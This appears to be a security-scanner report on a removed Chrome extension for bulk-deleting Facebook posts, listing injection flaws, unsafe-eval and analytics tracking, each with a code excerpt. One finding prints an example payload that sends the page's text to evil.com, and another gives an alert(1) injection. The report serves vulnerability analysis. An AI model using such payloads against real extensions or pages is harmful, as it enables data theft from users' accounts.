Social Book Post Manager

ID: ljfidlkcmdmmibngdfikhffffdmphjae

Could be malicious

Supported Languages

🇺🇸US English

Extension Info & Metadata

Status
Removed
Version
1.4.13
Size
0.28 MB
Rating
4.6/5
Reviews
43,049
Users
200,000
Type
Extension
Updated
Nov 15, 2019
Category
1_communication
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
htang.devView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
1
Active
0
Obsolete
1
Listed
1
Unlisted
0
Total Users
200,000

Batch delete posts in Fackbook (TM) timeline. Other batch processing: hide / unhide / unlike items. FREE!

==================================== >>> Batch delete Social Book posts/items >>> hide/unhide, unlike >>> Support All Languages on Social Book ==================================== ==================================== The extension is free to use for everyone. ==================================== * Facebook (TM) is a registered trade mark of Facebook. The author of this extension is by no mean associated or affiliated with Facebook. This extension uses absolutely NO any Facebook APIs, and it's therefore not binding with any Facebook APIs licenses. All the occurrences of the word "Facebook" is for descriptive purpose only, and hence it's legally allowed. #deletefacebook #BoycottFacebook "Social Book Post Manager" helps you to delete your posts through the activity log, which include posts by you, and by other persons/apps. You may specify "Year", "Month", "Text Contains", and "Text Not Contains" filters for posts to delete. Plus the activity log filters provided by Facebook (TM), you have full control of which posts to delete, and which posts to keep. Recent new features: 1) Text filters support AND/OR conditions. 2) Prescan the activity log. You can then select exactly which individual entries that you want to delete/hide/unhide/unlike/change privacy settings. 3) Hide/unhide timeline items. 4) Unlike items. ALL the features are FREE for you to use, and totally UNLIMITED. If you are satisfied, please leave me some feedback. Also please feel free to give me suggestion, and bug reports if any. >>> The process is slow. It simulates your mouse click on delete button one-by-one. This is the intentional limitation by Facebook (TM). There is no way to bypass it. <<< >>> Any other Chrome extension may conflict with this extension. If it's not working, please follow the instruction to remove/disable other Chrome extensions temporarily. Then restart Chrome and try again. <<< >>> Use filter features as much as possible, and try limit the number of posts to be processed. The more data need to be processed, the more likely your browser and the Facebook (TM) server will fail to function properly. It's recommended to process one month at a time, unless you are sure there isn't many posts left to be processed.<<< ================================ Notes: The scanning/deletion process takes a LONG time to finish, depending on number of posts involved. Because Facebook (TM) does not want the users to easily remove posts, they don't provide any function/API to delete multiple posts at a time. This extension can only filter/delete posts one-by-one. There is no any known method to accelerate this process. Please be patient, sit back, and let the extension does its job. You may have a coffee, or better just let it run through a night. ================================ ==================================== Privacy and Information Security 1) This extension does not track or record any user information. It does not use cookie or any other mechanism to record users page visits. 2) This extension does not track or record whether a user posts a review, or makes a donation. Whether you review/donate or not will not affect how it works. 3) Because this extension does not store anything anywhere, this app does not support features like auto-retry, user preference, etc. This is designed on purpose. I believe user privacy is much more important than any features, particularly for this Chrome extension. 4) This extension uses Google Analytics API to log which features (delete/hide/unlike, etc.) are being used most by the users, and whether the process runs successfully. The log result is not associated, nor linked with each individual user. The data is purely used by the author to know which features are used most, and whether it's working properly. If you want to be opted-out of this, you can install the Google Analytics Opt-out add-on in https://tools.google.com/dlpage/gaoptout 5) This extension is completely written in Javascript, and running completely within users Chrome browsers. All the source code can be viewed with Chrome Developer Tools. The code has been analyzed many times by many other developers. The extension has been used by nearly 200,000 users. If there is anything bad, it would have already been reported. You can feel absolutely safe to use it. ==================================== Instructions (with "Prescan" option checked): 1. Login to Facebook (TM), go to the Activity Log. Use activity filters to select a subset of posts to delete. 2. Click the extension's button to open the interface. 3. If needed, choose "Year", "Month", "Text Contains" and "Text Not Contains" for posts that you want to delete. 4. Click the "Delete Post" button. The extension will scan through your Activity Log and mark all posts matching the conditions. 5. The prescan process may take a long time, depending on number of posts to be deleted. 6. After the prescan process finishes, there will be a Confirm button shown on top of the Facebook (TM) page. You may verify and uncheck certain posts as desired, then continue to actually delete the posts. 7. When done, the extension reports total number of posts deleted. ================================ Instructions (with "Prescan" option unchecked): 1. Login to Facebook (TM), go to the Activity Log. Use activity filters to select a subset of posts to delete. 2. Click the extension's button to open the interface. 3. If needed, choose "Year", "Month", "Text Contains" and "Text Not Contains" for posts that you want to delete. 4. Click the "Delete Post" button. The extension will scan through your Activity Log and delete all posts matching the conditions. 5. The deletion process may take a long time, depending on number of posts to be deleted. 6. Deleted post counter is displayed in real-time. You may stop the deletion process at any time by clicking the "Stop Now" button. 7. When done, the extension reports total number of posts deleted. ================================ Update History: 1.4.13 Facebook (TM) changed underlying service call. I need to re-adjust the code again. 1.4.8-1.4.9 Removed all "ace". 1.4.7 Facebook (TM) changed their page layout again, privacy feature no longer works. I had to disable the button of this feature. 1.4.5-1.4.6 1) Add the year 2017. 2) Lower the default speed. 3) Add/modify some instructions. 1.4.4 1) Add option "Speed". This may improve the success rate for slower Internet/PC. 2) UI changes. 3) Bug fixes. 1.4.3 I has to deliberately slow down the batch process of privacy. When the extension is running too fast, Facebook (TM) does not process all the requests. 1.4.1-1.4.2 Bug fixes. 1.4.0 Now the extension can change privacy settings of posts in batch. 1.3.10 Bug fix. 1.3.9 Bug fix. 1.3.8 1) Detect and skip more Facebook (TM) deletion error and continue with the next item. 2) Performance optimization. 1.3.7 The extension will skip deletion error and continue with the next item. 1.3.6 Another another change on Facebook (TM), and Facebook (TM) pages of different languages have DIFFERENT structures!!! 1.3.5 Another change on Facebook (TM) 1.3.4 Facebook (TM) changed some underlying structure. The extension is revised so as to be compatible. 1.3.3 Facebook (TM) Comments can be properly deleted now. 1.3.2 Improvements on search to a specific year-month. 1.3.1 Add more instructions in the popup. 1.3.0 New semi-parallel delete process implementation. It's significantly faster now! 1.2.1-1.2.0 Now the string filters support AND / OR condition operators. 1.1.9-1.1.7 Bug fixes. 1.1.6 Added a Backup button, which links to Facebook (TM) "Download Your Information" page. 1.1.5-1.1.1 Bug fixes and GUI revision. 1.1.0 Major update 1) Added support for on-page prescan of the activity log. 2) Users can manually select/deselect entries to delete. 1.0.9 Optimization - almost 100% eliminated page-out-of-sync issue. 1.0.8 Bug fixes. 1.0.7 Optimization. 1.0.6 Bug fixes. 1.0.5 Bug fixes and optimization. 1.0.4 1) New feature: hide/unhide timeline items. 2) New feature: unlike items. 1.0.3 1) Added text filters for post deletion. 2) Added highlight effect upon text filters. 1.0.2 1) Added real-time display of deletion counter. 2) Added "Stop Now" button for immediate termination of the deletion process. 1.0.1 Optimization to reduce the chance of Page-out-of-sync issue. 1.0 Initial Version. ================================ Notes: 1. In certain scenario, the extension may stop working. Simply reload the Facebook (TM) page, reopen the extension's interface, and start the process again. 2. This extension does not retrieve or store any Facebook (TM) login credential, nor will it retrieve any other information from your Facebook (TM) account. 3. Deleted posts are not recoverable. Please carefully choose the Activity Log filter, the Year, and the Month for deletion. The author shall not take any responsibility for any potential loss of information due to post deletion. 4. I've thoroughly tested the extension upon the Facebook (TM) Activity Log, in multiple language interfaces, including English, French, Chinese, etc. So far, it works perfectly upon all language interfaces.

Item
Type
Severity
Description
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:• 15% increase: Older manifest version lacks modern security controls
activeTab
Permission
Medium
This permission grants temporary access to the current tab. Rated Medium because it can access current page content when invoked, though limited to user-initiated actions.
Older Manifest Version
Risk Factor
Medium
This extension uses Manifest Version 2
*://*.facebook.com/*
Permission
Unknown
No classification available for this permission.

User-controlled text from the 'Text Contains' and 'Text Not Contains' input fields is concatenated directly into a JavaScript code string passed to chrome.tabs.executeScript without any escaping or sanitization. An attacker who tricks the user into pasting a crafted value such as `";fetch('https://evil.com?d='+document.body.innerText)//` into the filter box would cause that code to execute in the context of the active Facebook tab, enabling data exfiltration of the entire activity log page contents. This is a stored-on-page code injection vector with direct access to Facebook DOM data.

ext-popup.js (Line 525)
$("#textContains").on("change paste mouseup keyup", function() {  if ($(this).val() != Popup.lastValueTextContains) {    Popup.lastValueTextContains = $(this).val();    chrome.tabs.executeScript({      code: 'Utils.containText="' + Popup.lastValueTextContains.trim().toLowerCase() + '";Utils.containTextFunc=null;Utils.highlighterStarted=true;Utils.highlight();'    });  }});$("#textNotContains").on("change paste mouseup keyup", function() {  if ($(this).val() != Popup.lastValueTextNotContains) {    Popup.lastValueTextNotContains = $(this).val();    chrome.tabs.executeScript({      code: 'Utils.notContainText="' + Popup.lastValueTextNotContains.trim().toLowerCase() + '";Utils.notContainTextFunc=null;Utils.highlighterStarted=true;Utils.highlight();'    });  }});

Multiple user-supplied filter values (dateRange, strContains, strNotContains) are interpolated without escaping into JavaScript code strings executed via chrome.tabs.executeScript on the active Facebook tab. Any of these paths can be exploited by a crafted input to break out of the string literal context and inject arbitrary JavaScript that runs with access to the Facebook page DOM. Combined with the 'Text Contains/Not Contains' real-time injection path at line 531, there are at least three unsanitized injection points targeting the Facebook page.

ext-popup.js (Line 274)
if (dateRange) {  console.log("Date Range: " + dateRange);  chrome.tabs.executeScript({    code: 'PostDeletor.dateRange="' + dateRange + '";'  });}var strContains = "";if ($("#textContains").val()) {  strContains = $("#textContains").val().trim().toLowerCase();  console.log(strContains);  chrome.tabs.executeScript({    code: 'PostDeletor.containText="' + strContains + '";'  });}var strNotContains = "";if ($("#textNotContains").val()) {  strNotContains = $("#textNotContains").val().trim().toLowerCase();  console.log(strNotContains);  chrome.tabs.executeScript({    code: 'PostDeletor.notContainText="' + strNotContains + '";'  });}

The extension explicitly declares 'unsafe-eval' in its Content Security Policy, allowing dynamic code evaluation via eval(), new Function(), and similar constructs across both the extension popup and content scripts. This is a mandatory prerequisite for the dynamic function construction observed elsewhere in the codebase. The CSP also whitelists an external domain (ssl.google-analytics.com) for script execution, creating a supply-chain attack surface if that origin is ever compromised.

manifest.json (Line 44)
{  "content_security_policy": [    "script-src 'self' 'unsafe-eval' https://ssl.google-analytics.com",    "object-src 'self'"  ]}

When the user's filter text contains the word 'and' or 'or', the extension builds a JavaScript function body by string-substituting the raw user input and passes it to new Function() — the equivalent of eval(). A crafted input such as `foo or alert(1)` or a more elaborate payload could escape the substitution regex and inject arbitrary JavaScript executed within the Facebook page content script context. The same pattern appears for notContainText (line 683) and is duplicated verbatim in content-commons-utils.js (lines 164-201), giving four total dynamic code construction sites.

content-postDeletor.js (Line 663)
PostDeletor.prepareContainTextFunc = function() {  if (PostDeletor.containText && !PostDeletor.containTextFunc) {    if (!PostDeletor.containText.match(/\b(and|or)\b/i)) {      PostDeletor.containTextFunc = "NA";      return;    }    try {      var containTextExp = math.parse(PostDeletor.containText);      var exp = PostDeletor.containText;      exp = exp.replace(/\band\b/g, "&&");      exp = exp.replace(/\bor\b/g, "||");      exp = exp.replace(/[\-\w\:\,\.]+(?:\s+[\-\w\:\,\.]+)*/g, "target.search('$&')>=0");      exp = "return " + exp + ";";      PostDeletor.containTextFunc = new Function('target', exp);    } catch (err) {      PostDeletor.containTextFunc = "NA";    }  }}

The background page dynamically injects a Google Analytics script (ga.js) from an external origin at runtime, and the manifest CSP explicitly whitelists ssl.google-analytics.com for this purpose. This creates a supply-chain risk: if the Analytics endpoint were compromised or the domain redirected, the injected script would execute with extension background page privileges. Additionally, the extension tracks detailed user operation events (delete, hide, unhide, unlike, privacy changes) and relays them to GA, constituting behavioral telemetry that users are unlikely aware of.

ext-eventPage.js (Line 1)
var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-73397006-2']);(function() {  var ga = document.createElement('script');  ga.type = 'text/javascript';  ga.async = true;  ga.src = 'https://ssl.google-analytics.com/ga.js';  var s = document.getElementsByTagName('script')[0];  s.parentNode.insertBefore(ga, s);})();chrome.runtime.onMessage.addListener(    function(request, sender, sendResponse) {      ...      else if (request && request.match(/^\{event\:/ig)) {        var m = request.match(/^\{event\:([^,]+),action\:([^\}]+)\}$/i);        if (m && m.length >= 3) {          var eventCategory = m[1];          var eventAction = m[2];          _gaq.push(['_trackEvent', eventCategory, eventAction]);        }      } else if (request && request.indexOf("Success!") == 0) {        var m = request.match(...);        _gaq.push(['_trackEvent', 'operation', 'success']);      }

The extension popup also dynamically loads Google Analytics from an external URL and fires a page-view event every time the popup is opened, tracking how frequently the extension is used. Combined with event tracking of every button click (delete, hide, unhide, unlike, privacy changes), the extension collects granular behavioral telemetry about users' Facebook activity management patterns without explicit disclosure in the permissions or UI.

ext-popup.js (Line 619)
var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-73397006-2']);_gaq.push(['_trackPageview']);(function() {  var ga = document.createElement('script');  ga.type = 'text/javascript';  ga.async = true;  ga.src = 'https://ssl.google-analytics.com/ga.js';  var s = document.getElementsByTagName('script')[0];  s.parentNode.insertBefore(ga, s);})();

By severity

Critical2
High2
Medium2
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.4.136

Files with findings

4 distinct paths — top paths by unique finding count:

  • ext-popup.js3
  • content-postDeletor.js1
  • ext-eventPage.js1
  • manifest.json1
S.No.
Category
Severity
File
Summary
Found in Version
1Code Injection
critical
ext-popup.js (line 525)User-controlled text from the 'Text Contains' and 'Text Not Contains' input fields is concatenated directly into a JavaScript code string passed to chrome.tabs.executeScript without any escaping or sanitization. An at…
2Code Injection
critical
ext-popup.js (line 274)Multiple user-supplied filter values (dateRange, strContains, strNotContains) are interpolated without escaping into JavaScript code strings executed via chrome.tabs.executeScript on the active Facebook tab. Any of th…
3Code Injection
high
manifest.json (line 44)The extension explicitly declares 'unsafe-eval' in its Content Security Policy, allowing dynamic code evaluation via eval(), new Function(), and similar constructs across both the extension popup and content scripts. …
4Code Injection
high
content-postDeletor.js (line 663)When the user's filter text contains the word 'and' or 'or', the extension builds a JavaScript function body by string-substituting the raw user input and passes it to new Function() — the equivalent of eval(). A craf…
5Remote Code Loading
medium
ext-eventPage.js (line 1)The background page dynamically injects a Google Analytics script (ga.js) from an external origin at runtime, and the manifest CSP explicitly whitelists ssl.google-analytics.com for this purpose. This creates a supply…
6Tracking
medium
ext-popup.js (line 619)The extension popup also dynamically loads Google Analytics from an external URL and fires a page-view event every time the popup is opened, tracking how frequently the extension is used. Combined with event tracking …
URLs
17
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

www.facebook.com/settingshttps://www.facebook.com/settings
chrome.google.com/webstore/detail/facebook-post-manager/ljfidlkcmdmmibngdfikhffffdmphjae/reviewshttps://chrome.google.com/webstore/detail/facebook-post-manager/ljfidlkcmdmmibngdfikhffffdmphjae/reviews
chrome.google.com/webstore/detail/social-book-post-manager/ljfidlkcmdmmibngdfikhffffdmphjae/reviews/https://chrome.google.com/webstore/detail/social-book-post-manager/ljfidlkcmdmmibngdfikhffffdmphjae/reviews\
www.paypal.me/hanshen/https://www.paypal.me/hanshen\
www.paypal.com/en_US/i/btn/btn_donate_LG.gif/https://www.paypal.com/en_US/i/btn/btn_donate_LG.gif\
ssl.google-analytics.com/ga.jshttps://ssl.google-analytics.com/ga.js
jqueryui.com-http://jqueryui.com
jqueryui.com/themeroller/http://jqueryui.com/themeroller/?ffDefault=Helvetica%2CArial%2Csans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=2px&bgColorHeader=dddddd&bgTextureHeader=highlight_soft&bgImgOpacityHeader=50&borderColorHeader=dddddd&fcHeader=444444&iconColorHeader=0073ea&bgColorContent=ffffff&bgTextureContent=flat&bgImgOpacityContent=75&borderColorContent=dddddd&fcContent=444444&iconColorContent=ff0084&bgColorDefault=f6f6f6&bgTextureDefault=highlight_soft&bgImgOpacityDefault=100&borderColorDefault=dddddd&fcDefault=0073ea&iconColorDefault=666666&bgColorHover=0073ea&bgTextureHover=highlight_soft&bgImgOpacityHover=25&borderColorHover=0073ea&fcHover=ffffff&iconColorHover=ffffff&bgColorActive=ffffff&bgTextureActive=glass&bgImgOpacityActive=65&borderColorActive=dddddd&fcActive=ff0084&iconColorActive=454545&bgColorHighlight=ffffff&bgTextureHighlight=flat&bgImgOpacityHighlight=55&borderColorHighlight=cccccc&fcHighlight=444444&iconColorHighlight=0073ea&bgColorError=ffffff&bgTextureError=flat&bgImgOpacityError=55&borderColorError=ff0084&fcError=222222&iconColorError=ff0084&bgColorOverlay=eeeeee&bgTextureOverlay=flat&bgImgOpacityOverlay=0&opacityOverlay=80&bgColorShadow=aaaaaa&bgTextureShadow=flat&bgImgOpacityShadow=0&opacityShadow=60&thicknessShadow=4px&offsetTopShadow=-4px&offsetLeftShadow=-4px&cornerRadiusShadow=0px
github.com/claviska/jquery-dropdownhttps://github.com/claviska/jquery-dropdown
opensource.org/licenses/MIThttp://opensource.org/licenses/MIT
Showing 1 to 10 of 20 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
1.4.13
Latest
0.28 MB
Malicious
6
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.